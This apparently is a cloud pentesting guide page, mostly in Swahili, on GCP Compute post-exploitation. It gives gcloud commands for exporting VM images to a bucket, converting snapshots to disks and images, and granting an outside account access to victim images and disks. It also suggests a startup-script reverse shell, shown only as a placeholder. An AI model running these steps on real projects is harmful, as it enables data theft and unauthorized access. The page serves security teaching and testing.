GCP - Compute Post Exploitation

Compute

Kwa maelezo zaidi kuhusu Compute na VPC (Networking) angalia:

Export & Inspect Images locally

Hii itamruhusu mshambuliaji kupata data zilizomo ndani ya picha zilizopo tayari au kuunda picha mpya za VMs zinazoendesha na kupata data zao bila kuwa na ufikiaji wa VM inayoendesha.

Inawezekana kusafirisha picha ya VM kwenye ndoo na kisha kuipakua na kuipachika ndani kwa amri:

gcloud compute images export --destination-uri gs://<bucket-name>/image.vmdk --image imagetest --export-format vmdk
# The download the export from the bucket and mount it locally

Kabla ya kufanya kitendo hiki mshambuliaji anaweza kuhitaji ruhusa juu ya storage bucket na kwa hakika ruhusa juu ya cloudbuild kwani ni huduma ambayo itaombwa kufanya usafirishaji Zaidi ya hayo, ili hili lifanye kazi, codebuild SA na compute SA zinahitaji ruhusa za kipekee. Cloudbuild SA <project-id>@cloudbuild.gserviceaccount.com inahitaji:

• roles/iam.serviceAccountTokenCreator

• roles/compute.admin

• roles/iam.serviceAccountUser

Na SA <project-id>-compute@developer.gserviceaccount.com inahitaji:

• roles/compute.storageAdmin

• roles/storage.objectAdmin

Kusafirisha & Kukagua Snapshots & Disks kwa ndani

Haiwezekani kusafirisha snapshots na disks moja kwa moja, lakini inawezekana kubadilisha snapshot kuwa disk, disk kuwa image na kufuata sehemu iliyotangulia, kusafirisha hiyo image ili kuikagua kwa ndani

# Create a Disk from a snapshot
gcloud compute disks create [NEW_DISK_NAME] --source-snapshot=[SNAPSHOT_NAME] --zone=[ZONE]

# Create an image from a disk
gcloud compute images create [IMAGE_NAME] --source-disk=[NEW_DISK_NAME] --source-disk-zone=[ZONE]

Kagua Picha kwa kuunda VM

Kwa lengo la kufikia data zilizohifadhiwa kwenye picha au ndani ya VM inayoendesha kutoka ambapo mshambulizi ameunda picha, inawezekana kutoa akaunti ya nje ufikiaji juu ya picha:

gcloud projects add-iam-policy-binding [SOURCE_PROJECT_ID] \
--member='serviceAccount:[TARGET_PROJECT_SERVICE_ACCOUNT]' \
--role='roles/compute.imageUser'

na kisha unda VM mpya kutoka kwayo:

gcloud compute instances create [INSTANCE_NAME] \
--project=[TARGET_PROJECT_ID] \
--zone=[ZONE] \
--image=projects/[SOURCE_PROJECT_ID]/global/images/[IMAGE_NAME]

Ikiwa huwezi kutoa akaunti yako ya nje ufikiaji juu ya picha, unaweza kuzindua VM ukitumia picha hiyo katika mradi wa mwathirika na kufanya metadata kutekeleza reverse shell ili kufikia picha kwa kuongeza param:

--metadata startup-script='#! /bin/bash
echo "hello"; <reverse shell>'

Inspect a Snapshot/Disk attaching it to a VM

Kwa lengo la kufikia data iliyohifadhiwa kwenye diski au snapshot, unaweza kubadilisha snapshot kuwa diski, diski kuwa picha na kufuata hatua za awali.

Au unaweza kumpa akaunti ya nje ufikiaji juu ya diski (kama mwanzo ni snapshot, toa ufikiaji juu ya snapshot au tengeneza diski kutoka kwayo):

gcloud projects add-iam-policy-binding [PROJECT_ID] \
--member='user:[USER_EMAIL]' \
--role='roles/compute.storageAdmin'

Ambatisha diski kwa instance:

gcloud compute instances attach-disk [INSTANCE_NAME] \
--disk [DISK_NAME] \
--zone [ZONE]

Mount the disk inside the VM:

1. SSH into the VM:

gcloud compute ssh [INSTANCE_NAME] --zone [ZONE]

2. Identify the Disk: Once inside the VM, identify the new disk by listing the disk devices. Typically, you can find it as /dev/sdb, /dev/sdc, etc.

3. Format and Mount the Disk (if it's a new or raw disk):

• Create a mount point:

sudo mkdir -p /mnt/disks/[MOUNT_DIR]

• Mount the disk:

sudo mount -o discard,defaults /dev/[DISK_DEVICE] /mnt/disks/[MOUNT_DIR]

Ikiwa huwezi kutoa ufikiaji kwa mradi wa nje kwa snapshot au disk, unaweza kuhitaji kufanya vitendo hivi ndani ya mfano katika mradi huo huo kama snapshot/disk.